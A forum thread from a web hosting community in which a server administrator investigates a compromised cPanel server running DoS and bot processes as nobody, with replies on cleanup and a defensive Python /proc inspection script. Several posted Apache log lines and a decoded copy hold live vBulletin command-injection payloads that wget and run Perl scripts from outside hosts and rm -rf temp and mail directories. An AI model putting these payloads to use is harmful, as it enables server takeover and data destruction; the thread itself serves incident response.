Process running as nobody

#1
Web Hosting Guru
Join Date: Sep 2003
Location: UK
Posts: 342

Hi all,

Below is a copy of my top

Code:
12:14:26  up 50 days, 59 min,  1 user,  load average: 0.39, 0.42, 0.59
257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped
CPU states:  15.2% user   5.5% system   0.0% nice   0.0% iowait  79.1% idle
Mem:   514196k av,  502628k used,   11568k free,       0k shrd,  112768k buff
       156332k active,             310968k inactive
Swap: 2104504k av,  196156k used, 1908348k free                  145632k cached

  PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME CPU COMMAND
 2465 root      19   0  1184 1184   804 R     5.5  0.2   0:01   0 top
31482 nobody    10   0   608  604   548 S     1.3  0.1   0:10   0 ./lol 30
 1089 root      19  19 33184  13M 10400 S N   0.9  2.7  1646m   0 ./server_linux -PID=tsserver2.pid
28521 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
28523 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
19621 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20010 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20014 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20028 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
20469 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
20610 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
22113 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
23021 nobody     9   0   608  604   548 S     0.4  0.1   0:10   0 ./lol 30
23096 nobody     9   0   604  600   544 S     0.4  0.1   0:10   0 ./lol 30
23497 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
23506 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24227 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
24229 nobody     9   0   600  596   540 S     0.4  0.1   0:09   0 ./lol 30
25163 nobody     9   0   596  592   536 S     0.4  0.1   0:08   0 ./lol 30
26179 nobody     9   0   584  580   524 S     0.4  0.1   0:07   0 ./lol 30
26561 nobody     9   0   584  580   524 S     0.4  0.1   0:06   0 ./lol 30
27201 nobody     9   0   580  576   520 S     0.4  0.1   0:06   0 ./lol 30
28045 nobody     9   0   576  572   516 S     0.4  0.1   0:06   0 ./lol 30
28381 nobody     9   0   576  572   516 S     0.4  0.1   0:05   0 ./lol 30
28529 nobody     9   0   528  524   464 S     0.4  0.1   0:08   0 ./lol 30
28634 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
28860 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
30670 nobody     9   0   544  540   484 S     0.4  0.1   0:01   0 ./lol 30
31106 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
31254 nobody     9   0   608  604   548 S     0.4  0.1   0:11   0 ./lol 30
    1 root       8   0   472  440   424 S     0.0  0.0   0:58   0 init [3]
    2 root       9   0     0    0     0 SW    0.0  0.0   0:01   0 keventd
    3 root       9   0     0    0     0 SW    0.0  0.0   2:32   0 kapmd
    4 root      19  19     0    0     0 SWN   0.0  0.0   0:00   0 ksoftirqd_CPU0
    5 root       9   0     0    0     0 SW    0.0  0.0   7:31   0 kswapd
    6 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 bdflush
    7 root       9   0     0    0     0 SW    0.0  0.0   2:02   0 kupdated
    8 root     18446744073709551615 -20     0    0     0 SW<   0.0  0.0   0:00   0 mdrecoveryd
   58 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 khubd
  277 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 kjournald
  278 root       9   0     0    0     0 SW    0.0  0.0   4:17   0 kjournald
  279 root       9   0     0    0     0 SW    0.0  0.0   1:25   0 kjournald
  280 root       9   0     0    0     0 SW    0.0  0.0   6:15   0 kjournald
  281 root       9   0     0    0     0 SW    0.0  0.0   3:22   0 kjournald
  750 root       9   0   556  520   476 S     0.0  0.1   3:41   0 syslogd -m 0
  754 root       9   0   420  368   368 S     0.0  0.0   0:00   0 klogd -x
 4411 root       9   0   984  776   776 S     0.0  0.1   0:00   0 /bin/bash
 4414 root       9   0   940  804   788 S     0.0  0.1   0:38   0 /usr/sbin/sshd
 4428 root       8   0   752  668   620 S     0.0  0.1   0:04   0 xinetd -stayalive -pidfile /var/run/xinetd.pid
 4670 root       8   0   580  568   524 S     0.0  0.1   0:18   0 crond
I have just noticed ./lol 30 scripts being run as nobody.
I have checked /tmp (which is non-executable) and /var/tmp (again the same), and have just checked /dev/shm (which isn't non-executable).

I removed a few files from there.
I have tried killing the processes; however, more seem to appear.

Can anyone help?

Thanks

__________________
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.



#2
Web Hosting Master
Join Date: Feb 2004
Posts: 2,197

Try running:

killall -9 lol

To find the file you can use:

locate lol


You may also want to install and run rkhunter and/or chkrootkit.

__________________
crucialparadigm - Affordable, Reliable, Professional :
Web Hosting
• 24/7 Support • Web Hosting • Reseller Hosting • Cloud/VPS Plans • Dedicated Servers •
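locate only knows the files indexed by the last updatedb run, so a tool dropped since then, or deleted after launch, will not show up; reading /proc ties each live process to its real binary and working directory instead. This is an added example in Python for the OP's situation, not code from either post; the list of suspect directories and the nobody default are assumptions based on the places named in the thread.

```python
"""Tie each process owned by an unprivileged web user (default: nobody) to its real
executable and working directory by reading Linux /proc, instead of relying on
locate, which only knows files indexed by the last updatedb run and cannot see
a binary that was deleted after launch.

Added example for this thread, not code from either post. The directory list
below is an assumption based on the places named in the thread."""
import os
import pwd
import sys

# Places where a legitimately installed daemon should not live or work from.
# /usr/local/apache/proxy is where the OP eventually found the tools.
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/usr/local/apache/proxy",
                "/var/spool/mail", "/var/mail")


def parse_status(text):
    """Parse /proc/<pid>/status ('Key:\\tvalue' lines) into a dict."""
    fields = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def assess(cmdline, exe, cwd):
    """Return the reasons a process looks out of place (empty list = nothing notable).

    cmdline: argv list from /proc/<pid>/cmdline; exe, cwd: readlink() results of
    /proc/<pid>/exe and /proc/<pid>/cwd."""
    reasons = []
    real_exe = exe.replace(" (deleted)", "")
    if exe != real_exe:
        reasons.append("binary was deleted from disk while still running")
    for d in SUSPECT_DIRS:
        if real_exe.startswith(d + "/") or cwd == d or cwd.startswith(d + "/"):
            reasons.append("executes from or works in " + d)
            break
    argv0 = cmdline[0] if cmdline else ""
    # "./lol 30" style: the binary lives in cwd, not in a PATH directory.
    if argv0.startswith("./"):
        reasons.append("launched with relative path %r from %s" % (argv0, cwd))
    # An argv[0] that imitates a daemon name ("httpd -DSSL") but is not the
    # executable that is actually mapped. Symlinked invocations also trip this,
    # so treat it as a prompt to look, not as proof.
    if argv0 and os.path.basename(argv0) != os.path.basename(real_exe):
        reasons.append("argv[0] %r does not match executable %r" % (argv0, real_exe))
    return reasons


def processes_for_user(username="nobody", proc="/proc"):
    """Yield (pid, name, cmdline, exe, cwd, reasons) for every live process of username.

    Reading exe/cwd of another user's process needs root; unreadable or exited
    processes (and kernel threads, which have no exe) are skipped."""
    uid = str(pwd.getpwnam(username).pw_uid)
    for pid in filter(str.isdigit, os.listdir(proc)):
        base = os.path.join(proc, pid)
        try:
            with open(os.path.join(base, "status")) as f:
                status = parse_status(f.read())
            if status.get("Uid", "").split()[:1] != [uid]:   # first field: real uid
                continue
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            exe = os.readlink(os.path.join(base, "exe"))
            cwd = os.readlink(os.path.join(base, "cwd"))
        except OSError:
            continue
        yield pid, status.get("Name", ""), cmdline, exe, cwd, assess(cmdline, exe, cwd)


if __name__ == "__main__":
    user = sys.argv[1] if len(sys.argv) > 1 else "nobody"
    for pid, name, cmdline, exe, cwd, reasons in processes_for_user(user):
        print("%s %6s %-15s exe=%s cwd=%s argv=%s" % ("!!" if reasons else "  ",
              pid, name, exe, cwd, " ".join(cmdline)))
        for r in reasons:
            print("          - " + r)
```

Run it as root so the exe and cwd links of nobody's processes are readable; kill the processes only after noting the paths, since the cwd link is the quickest route to the directory they were started from.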

#3
Web Hosting Master
Join Date: Dec 2004
Location: Canada
Posts: 1,082

Looks like your box has been exploited.

__________________
>> Keenan Tims
http://www.gotroot.ca/ | ktims@gotroot.ca

#4
Web Hosting Master
Join Date: Apr 2003
Location: UK
Posts: 2,560

If I remember correctly, lol is a dosser, and I suspect you'll find your attacker has got in via an insecure web script (check things like phpBB + Coppermine versions).

Check /var/tmp and /tmp for directories such as ". . " and the like.

#5
Web Hosting Master
Join Date: Nov 2004
Location: Dallas
Posts: 739

Yep, check tmp or kill all processes running as nobody.

#6
Web Hosting Guru
Join Date: Sep 2003
Location: UK
Posts: 342

Hi there,

I have run locate lol before; however, nothing out of the ordinary comes up, just a lot of .gif files.
I'm running updatedb and then going to try locate again to see if anything new comes up.
I have double checked all directories and removed some more . folders.

Does anyone have a URL or any more information on the lol dosser, so I can isolate it and prevent it in the future?

//EDIT Just found lots of files in /usr/local/apache/proxy

One dir is Strobe, which is a port prober. There is also a dir called scan which contains the lol files, and a dir called flood; is it safe to remove the dir called flood?

Also, does Apache need the folder called proxy? If so, what folders does it need? There is also httpd -DSSL in it; is that another trick?

Thanks



Last edited by Veus; 01-12-2005 at 11:24 AM.
#7
Web Hosting Master
Join Date: Apr 2003
Location: UK
Posts: 2,560

Yeah, that's a trick; we've seen the same (hackers'?) tools on one of our customers' servers repeatedly. Out of interest, is this a cPanel server?

They used a file called httpd -DSSL as well as various other rubbish renaming methods. Also included were psyBNCs and bots. Most of their stuff they kept in /tmp and /var/tmp, although I did find stuff elsewhere. Try looking in your Apache logs for wget.

#8
Web Hosting Guru
Join Date: Sep 2003
Location: UK
Posts: 342

That's the same as what I found, quite a few psyBNCs and a few bots. I'll have a look, thanks.
Yeah, it is a cPanel server.
I'm running grep -i wget * on my logs now to find which user is being careless!


#9
Web Hosting Master
Join Date: Apr 2003
Location: UK
Posts: 2,560

We found it was an old version of the Coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure version).

#10
Web Hosting Guru
Join Date: Sep 2003
Location: UK
Posts: 342

After searching for wget in the domlogs I have found the following entries:

Code:
/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f088
9555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"
/usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;pe
rl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803"
/usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;
perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64"
/usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117
;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63"
/usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
It is a vBulletin installation running the latest 3.0.5. Does anyone recognise this pattern?


#11
Web Hosting Master
Join Date: Jun 2003
Posts: 961

Code:
GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget
%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527
is
GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl 